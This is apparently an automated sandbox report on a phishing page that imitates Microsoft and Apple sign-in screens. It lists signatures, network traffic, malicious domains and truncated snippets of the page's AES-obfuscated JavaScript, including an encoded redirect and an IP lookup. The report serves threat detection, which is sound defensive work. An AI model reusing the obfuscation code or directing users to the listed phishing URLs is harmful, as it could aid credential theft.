Edit tour

Windows Analysis Report
https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.html

Overview

General Information

Sample URL:	https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.html
Analysis ID:	1559707

Detection

Gabagool

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Gabagool

AI detected landing page (webpage, office document or email)

HTML page contains suspicious javascript code

HTML body contains low number of good links

HTML body with high number of embedded images detected

HTML page contains hidden javascript code

HTML title does not match URL

Javascript checks online IP of machine

Stores files to the Windows start menu directory

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

Process Tree

System is w10x64_ra

chrome.exe (PID: 6964 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

chrome.exe (PID: 2040 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1892,i,3978886160351482774,15126113003015112201,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

chrome.exe (PID: 5648 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.html" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author	Strings
1.4.pages.csv	JoeSecurity_Gabagool	Yara detected Gabagool	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

Yara detected Gabagool

Source: Yara match

File source: 1.4.pages.csv, type: HTML

AI detected landing page (webpage, office document or email)

Source: https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.html

Joe Sandbox AI: Page contains button: 'VIEW DOCUMENT' Source: '1.0.pages.csv'

HTML page contains suspicious javascript code

Source: https://idiontsyashie.top/ppp/#

HTTP Parser: window.location.href = atob(

Source: https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.html

HTTP Parser: Number of links: 0

Source: https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.html

HTTP Parser: Total embedded image size: 45708

Source: https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.html

HTTP Parser: Base64 decoded: 1217984909,3700309840

Source: https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.html

HTTP Parser: Title: Account sign in does not match URL

Source: https://idiontsyashie.top/ppp/#

HTTP Parser: let current_ip = null;function tixzz(plaintext, key) { const keysize = [16, 24, 32]; if (!keysize.includes(key.length)) { throw new error("incorrect aes key length. use a 16, 24, or 32 bytes key."); } // generate a random iv (initialization vector) const iv = cryptojs.lib.wordarray.random(16); // encrypt the plain text using aes with the given key and random iv const encrypted = cryptojs.aes.encrypt(cryptojs.enc.utf8.parse(plaintext), cryptojs.enc.utf8.parse(key), { iv: iv, mode: cryptojs.mode.cbc, padding: cryptojs.pad.pkcs7 }); // combine the iv and ciphertext (iv is necessary for decryption) const encrypteddata = iv.concat(encrypted.ciphertext); // convert the combined data to base64 for easy transmission or storage return cryptojs.enc.base64.stringify(encrypteddata);}let psk = "xt84dvjb3ycnjlgjmptqx+s3k8hhvn+czzkfd+ithpmvky+2+cmun2/wg1medkb5i9sbdmv/fnbfy/mcmxg2nw==";async function tytei6uk() { try { const response = await fetch("http...

Source: https://idiontsyashie.top/ppp/#

HTTP Parser: let usuuid = "xt84dvjb3ycnjlgjmptqx+s3k8hhvn+czzkfd+ithpmvky+2+cmun2/wg1medkb5i9sbdmv/fnbfy/mcmxg2nw=="; let policy = "pxmvmec2r2ugrndvjdt/6gp5msx1bwn4czrd0lm5xy9mvsoya3rymff+cnjdqdxc";let sv = "0"; let sir = "1"; function decstr(encryptedstring, key) { const keysize = [16, 24, 32]; if (!keysize.includes(key.length)) { throw new error("incorrect aes key length. use a 16, 24, or 32 bytes key."); } const encrypteddata = cryptojs.enc.base64.parse(encryptedstring); const iv = cryptojs.lib.wordarray.create(encrypteddata.words.slice(0, 4)); const ciphertext = cryptojs.lib.wordarray.create( encrypteddata.words.slice(4) ); const decrypteddata = cryptojs.aes.decrypt( { ciphertext: ciphertext, }, cryptojs.enc.utf8.par...

Source: https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.html	HTTP Parser: No favicon
Source: https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.html	HTTP Parser: No favicon
Source: https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.html	HTTP Parser: No favicon
Source: https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.html	HTTP Parser: No favicon

Source: https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.html

HTTP Parser: No <meta name="author".. found

Source: https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.html

HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.17:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.17:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.17:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.17:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.16.158.192:443 -> 192.168.2.17:49730 version: TLS 1.2

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 29MB

Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.109.164
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.109.164
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.109.164
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.109.164
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.109.164
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.109.164
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.109.164
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.109.164
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.109.164
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.109.164

Source: global traffic	DNS traffic detected: DNS query: pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: idiontsyashie.top
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: o365.alnassers.net
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703

Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.17:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.17:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.17:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.17:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.16.158.192:443 -> 192.168.2.17:49730 version: TLS 1.2

Source: classification engine

Classification label: mal56.phis.win@17/14@24/165

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1892,i,3978886160351482774,15126113003015112201,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1892,i,3978886160351482774,15126113003015112201,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scripting	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Registry Run Keys / Startup Folder	1 Extra Window Memory Injection	1 Deobfuscate/Decode Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Extra Window Memory Injection	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction

Source	Detection	Scanner	Label	Link
https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.html	0%	Avira URL Cloud	safe

Name	IP	Active	Malicious	Reputation
idiontsyashie.top	164.90.149.168	true	false	unknown
code.jquery.com	151.101.66.137	true	false	high
cdnjs.cloudflare.com	104.17.25.14	true	false	high
www.google.com	142.250.181.100	true	false	high
api.ipify.org	104.26.12.205	true	false	high
pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev	162.159.140.237	true	false	unknown
o365.alnassers.net	147.79.74.176	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.html	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.17.24.14	unknown	United States	13335	CLOUDFLARENETUS	false
172.217.19.238	unknown	United States	15169	GOOGLEUS	false
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
1.1.1.1	unknown	Australia	13335	CLOUDFLARENETUS	false
162.159.140.237	pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev	United States	13335	CLOUDFLARENETUS	false
172.217.17.35	unknown	United States	15169	GOOGLEUS	false
172.217.17.46	unknown	United States	15169	GOOGLEUS	false
164.90.149.168	idiontsyashie.top	United States	14061	DIGITALOCEAN-ASNUS	false
142.250.181.100	www.google.com	United States	15169	GOOGLEUS	false
147.79.74.176	o365.alnassers.net	United States	208485	EKSENBILISIMTR	false
151.101.2.137	unknown	United States	54113	FASTLYUS	false
74.125.205.84	unknown	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
172.217.19.170	unknown	United States	15169	GOOGLEUS	false
151.101.66.137	code.jquery.com	United States	54113	FASTLYUS	false
172.217.21.35	unknown	United States	15169	GOOGLEUS	false
104.26.13.205	unknown	United States	13335	CLOUDFLARENETUS	false
104.17.25.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.17

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1559707
Start date and time:	2024-11-20 20:55:26 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.html
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal56.phis.win@17/14@24/165

Warnings

Exclude process from analysis (whitelisted): TextInputHost.exe
Excluded IPs from analysis (whitelisted): 172.217.21.35, 172.217.19.238, 74.125.205.84
Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, clientservices.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.html

Input	Output
URL: https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": true, "ip_in_url": false, "long_subdomain": true, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": true }
URL: https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev
URL: https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.html Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "YOU HAVE BEEN GRANTED ACCESS TO VIEW THIS DOCUMENT", "prominent_button_name": "VIEW DOCUMENT", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": true, "has_urgent_text": false, "has_visible_qrcode": false }

URL: https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.html Model: Joe Sandbox AI	{ "brands": [ "Apple" ] }

URL: https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.html Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "Next", "text_input_field_labels": "Email, phone, or Skype", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false }

URL: https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.html Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 20 18:55:59 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9883433386155187
Encrypted:	false
SSDEEP:
MD5:	95D365D40D2CA34403A3B1D9C58E3851
SHA1:	6E6C67BC35DBB58D574004BAFAFECFA7BB07F4F3
SHA-256:	28A8F698319862DAB9E2755812A8B9795F609CDA15DCF22D3696F8DCA4A9EC9E
SHA-512:	0DE7D85E8E53A4E0E4E9E6E12CDBC07966E4CED050FE6059F10287097644B01D295ECB59A901E1297875F3E669C6A5A0EFFB7B13364A6F4FEA5DF4795B0AFFAA
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,......w8.;......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.ItY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VtY......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VtY......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VtY.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VtY.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........H........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 20 18:55:59 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	4.003432095757571
Encrypted:	false
SSDEEP:
MD5:	0D9CE3DDBFA109316E38F93C7F8C7C3F
SHA1:	45B8FBC56F8FAD05E330927DA2DFD0CC33CBAFFE
SHA-256:	F3EC1035A7466C4B2486B056F3EB9F36C18AC75E726B1451D5AC05463A8D7657
SHA-512:	A080264921269A1722BE10AEEAFB828EE7CEB4ACB7DA9FCF5A09B522A38E582AB8A47F61D78F5497DD82C4DC5446CFCFC5A6BC02D5867939071F91280B614983
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....y.U8.;......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.ItY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VtY......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VtY......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VtY.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VtY.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........H........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.016835872720586
Encrypted:	false
SSDEEP:
MD5:	35E887A7114AC437891F4DD9CC3A1939
SHA1:	65BFF05E71EEB402F24303EE440C28142EA5E6FE
SHA-256:	A930C90B671244FCC5F660DE283DB902A244803359B4A8332709637D8682BDFD
SHA-512:	6602B71774CD8EAC8F18070CDDE4D89D47495465B5E19A9C7BC2C64F70E95C4476E7A881BC34F68E09BEC84051D09203016402F392E750D3DD1FBEB2FF9080CD
Malicious:	false
Reputation:	unknown
